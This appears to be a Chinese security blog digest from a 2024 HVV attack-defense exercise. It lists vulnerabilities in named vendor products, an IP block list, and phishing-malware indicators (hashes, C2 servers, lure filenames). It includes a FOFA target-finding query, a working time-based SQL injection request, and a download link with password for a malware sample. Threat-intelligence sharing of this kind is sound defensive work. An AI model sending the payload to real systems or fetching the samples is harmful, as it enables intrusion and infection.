day3-HVV 再添新成员，八贱客登场：xx康、xx达、锐xx、科xx

不第后赋菊
唐·黄巢
待到秋来九月八，我花开后百花杀。
冲天香阵透长安，满城尽带黄金甲。

随着2024HVV的进行，各大厂商的薄弱点都正逐渐显露出来。一起来看看最新钓鱼木马，以及新的一天又有哪些企业中招了！
一、红队攻击

1. 红队漏洞情况
   【漏洞名称】：XXXX RocketMQ 敏感数据泄露漏洞（暂未复现）
   <漏洞描述>：受影响版本中存在敏感信息泄露漏洞，未经授权的用户可以在启用身份验证和授权功能的情况下获得敏感信息。拥有普通用户权限的攻击者可以通过特定接口窃取管理员账号和密码从而获得RocketMQ权限。
   修复版本中，通过增加权限检查和验证，细化访问配置以修复漏洞。强烈建议将 RocketMQ ACL 升级为2.0。
   <修复方案>：
   将组件 org.apache.rocketmq:rocketmq-acl 升级至 5.3.0 及以上版本
   将组件 org.apache.rocketmq:rocketmq-all 升级至 5.3.0 及以上版本
   将组件 rocketmq 升级至 5.3.0 及以上版本

【漏洞名称】：xx平台-无限回调系统 -SQL

<漏洞描述>：xx平台无限回调系统 /user/ajax.php 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
网站图片：

<fofa语法>：

body="mb-5 web-font-desc"

<漏洞复现>：

延迟5秒 payload：

POST /user/ajax.php?act=siteadd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
siteUrl=';select sleep(5)#'

<效果图>：

【帆xx】漏洞列表：

（已复现）OA-反序列化RCE
（已复现）V11 0day sql注入至rce

【xx微】漏洞列表：

（已复现）e-cology 9 WorkflowServiceXml SQL注入漏洞

（已复现）E-Mobile移动管理平台installOperate.do存在SSRF漏洞

（已复现）e-cology 9 存在SSRF漏洞

【xx远】漏洞列表：

（已复现）OA fileUpload.do 前台文件上传绕过漏洞

【xx友】漏洞列表：

（已复现）NC querygoodsgridbycode存在SQL注入漏洞

（已复现）U8Cloud MonitorServlet 存在反序列化漏洞

（已复现）U8-CRM import任意文件上传漏洞

（已复现）NC-Cloud blobRefClassSearch接口存在FastJson反序列化漏洞

【xx康】漏洞列表：

综合安防管理平台detection前台远程命令执行

综合安防管理平台-反序列化RCE/SQL/文件上传

安全接入网关-任意文件读取

【xx达】漏洞列表：

Linkworks协同办公管理平台-XXE/SQL/文件上传

OA接口-XML实体注入/SQL/文件上传

【锐xx】漏洞列表：

校园网自助服务系统-目录遍历/SQL/任意文件读取

RG-UAC统一上网行为管理审计系统存在账号密码信息泄露

NBR路由器-文件上传

交换机 WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞

【科xx】漏洞列表：

一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞

一卡通管理系统get_kq_tj_today存在SQL注入漏洞

图书馆云平台存在SQL注入漏洞

二、蓝队防守
1.蓝队封禁IP列表
85.122.195.73
8.218.147.18
47.102.135.184
47.103.87.12
46.246.4.17
47.121.119.130
47.97.111.157
47.91.14.8
47.96.78.5
47.99.195.123
52.250.30.171
52.171.219.111
60.204.133.197
60.205.226.146

2.木马样本情报
***最新钓鱼木马：explorerLoader.exe

通过分析确认木马，无报毒，且具有数字签名

区分方法：
正规文件：
1、运行exe打开Windows资源管理器
2、文件大小x64 （4,912,480 字节）
非正规文件：
1、报错弹出蓝色窗口 但是已经隐藏运行
2、文件大小x64（5,000,000 字节以上）

医药商业报销.PIF

SHA256:d3cf90433e96a46b8aee6da223caf20271fd9f861a10d9f3b194bfc55f88163b
MD5：d07206e06447557c67330a0f979d2b2f
相关IP或域名：media.jinsixian.cn、safari.qifudeng.com
样本地址：https://i.3001.net/uploads/Up_imgs/20240724-3dc493f8e6a6da03403923801d5d131c.zip
【样本解压密码:threatbook】解压后可改名还原

2024 重点保障安全意识培训参会人员名单.zip

SHA256：c9d2dca72286c01e068b1995e3aa7772ff9686a492b89e8b8c7b0ecaf715cf40
MD5：eb97e771dc4dd54c18553471d5fe3bbb
C2：110.41.46.45:9111
攻击手法：Rust、APC 调用CobaltStrike 木马

关于 2024 年公司财务调整的通知.exe

SHA256：d44f628b8e447249ef9ce8871350c52693c1f31cb126307be9f1b2c535053a4a
MD5：248b44673cbb0384180fc62ca972f018
来源：向日葵多协议 RDP 插件

关于 2024 攻防演练员工守则通知.exe

SHA256：bccd982dab220d22689cf81277789ef64b32f575a08f604e1a75da1d5d6aee10
MD5：1c26667276b0f3f69ab55bf8b34fdd22
C2：8.134.249.167:9099
攻击手法：利用微信检测虚拟机后门木马

集团“星火计划”推荐学员参加选拔考试通知_docx.exe

SHA256：54a28a2bc66c4529aaf2c7b92d724f2a2943dcd12bb960f43e6d34cf90ace700
MD5：7c29a8b9e872af42b5d92dc98f87a917
C2：59.42.126.162:80
来源：CobaltStrike 木马

徐加李简历.docx.exe

SHA256：d86db50d6990d345a1280991b757c770b661d94592a68a95c48b189b7ac4bf50
MD5：b97e176e0ee5987ddfe98e056df343e9
SHA1：3bdde433ae2579d8270110fa6281e2feca7

d6225

**金融(渠道经理).zip

SHA256：431d010c90b451c107d4160bb134ff072cf8c7076f16ab516faa2d31ef3c4759
MD5：6330fab9ce531ce8943132272a3cb2a7
相关IP域名/C2：mobile.static.apiproxy.cloud.360.net/mobile.static.apiproxy.cloud.360.net.cdn.dnsv1.com:443
攻击手法：域前置CobaltStrike 木马

**会议（去除 30 分钟限制）.exe

SHA256：ac962605550d120d4d38ba87a10c87027c7ccb3f430475c0104646183bc6f825
MD5：2a04ff4412e48aabdc6fc073ae734cd2
C2：154.12.83.210:54123
攻击手法：资源段解密执行CobaltStrike 木马

**有限公司社会招聘报名登记表.exe

SHA256：02bbeb4d9d6f13fe1db44a0a2da572b1596d9ff59b79376e8afaeab0ba76a1d6
MD5：09c7199b2bcd0d908a2b8d6867a1b240
C2：2gwxrah28rj0z.cfc-execute.bj.baidubce.com
攻击手法：垃圾代码耗时、RustCobaltStrike 木马

第三周周报.exe

SHA256：090a42171e42477dbcf0d02a4e901e8eb20cfde8c1765c9a67a84bafd256b2a4
MD5：5cd7b3e9950c5169a5278bdee38438ef
C2：2gwxrah28rj0z.cfc-execute.bj.baidubce.com，downloadlog.oss-cn-chengdu.aliyuncs.com
攻击手法：go 编译，从对象存储中获取到加密载荷CobaltStrike 木马

测试 tdp (2).zip

SHA256：13d7483a1f1a0b72aaa09ec985797556eeb402c893013a5bc08b706300c5bb3d
MD5：e2eba605cf1b6822e1bd9cb06bd334db
C2：101.200.150.8:8089
攻击手法：原版 CS CobaltStrike 木马

《关于集团网络资产评估管理有关事项的通知》.exe

SHA256：f1d4316a2c7bccf197ee6209389fe1ad7aef8a3b94aebae5548c8d1a05f036cd
MD5：1b50d0cc313552072462327588f93a49
C2：117.50.187.104:443
来源：CobaltStrike 木马

对于**有限公司的异议书.exe

SHA256：7b9c13919a006396b8c60eeaa54bd5728ef70aa7b7890232f3752506243a3e66
MD5：32a8cade2024195a71aeb1ebbd1c296f
C2：175.178.226.246:33333
来源：CobaltStrike 木马

artifact.exe

SHA256：c716ebfc4ae128c5d3b5a882683d7ca833bc4f339909cba4153425d4df765954
MD5：9974ad03575c5a8bfae6f2bb787321ea
C2：39.101.122.168:89
来源：CobaltStrike 木马

***服务平台-存在弱口令漏洞.exe

SHA256：2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655
MD5：aef9c59cb030b7e4038ca9850c95f8a2
C2：www.tencentcloud.site
攻击手法：白加黑CobaltStrike 木马

杨*.rar

SHA256：7a5fdc1afaadd9d3673b922c45d65061b0ac01f9ffce6b0aec1126d843561f72
MD5：6a0427a10e8e51b1db6c5670fe071f82
相关IP域名：36.249.64.101:443（CDN），www.jinsixian.cn（Host）
攻击手法：域前置CobaltStrike 木马

***服务平台-存在弱口令漏洞.exe

SHA256：2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655
MD5：aef9c59cb030b7e4038ca9850c95f8a2
C2：www.tencentcloud.site
攻击手法：白加黑CobaltStrike 木马

Desktop.exe

SHA256：ce19a3062a20d0f2b0bc2a774c11912214aba6e27a191ae31bb96bf6610ca765
MD5：65c7f30fde67152da3176a8b55577acc
C2：101.132.194.179:8081
来源：CobaltStrike 木马

edragent

SHA256：e3ef6b7090bba1ca1590f09538f2261d78dbfbea1435dd99b1e8e12e1636bbe5
MD5：a7a2d23e0b1941876d043f0af6e71110
C2：139.196.210.163:50010
来源：CobaltStrike 木马

三、闲谈

太用力的人走不远，精力管理决定走多远……

和师傅们共勉

吃瓜：暴风雨即将来临？师傅们准备好了吗

四、公众号

赖杨健

WIS-HUNTER病毒猎手

杀手锏攻防实验室

资深安全架构师

18年以上安全行业工作经验

曾供职于启明星辰、爱立信、阿朗、上汽等大型企业

持有CISP-IRE, CISP-PTS,OSCP,CISSP国内国际安全证书

团队成立于2016年，WIS-HUNTER（中文全称智慧网络病毒猎手），拥有最全的信息安全服务内容；具备强大的安全研究团队，公司下辖多个实验室，其中杀手锏攻防实验室拥有大批漏洞发掘和分析人员，是独立发掘CVE和CNVD漏洞数量的团队；拥有覆盖8*N人的专业安全服务团队。
团队理念：
【理念】
以小博大，技术是杀手锏。
【文化】
1.明白人：知其然，知其所以然！不要迷惑于表象而要洞察事务的本质，要有文盲学习知识的心态，有时我们的学历，是我们学习过程中 最大的障碍。
2.出品人：本人出品，必属上品！有自我荣誉意识、追求卓越意识。乔布斯：人这辈子没法做太多事情，所以每一件都要做到精彩绝伦。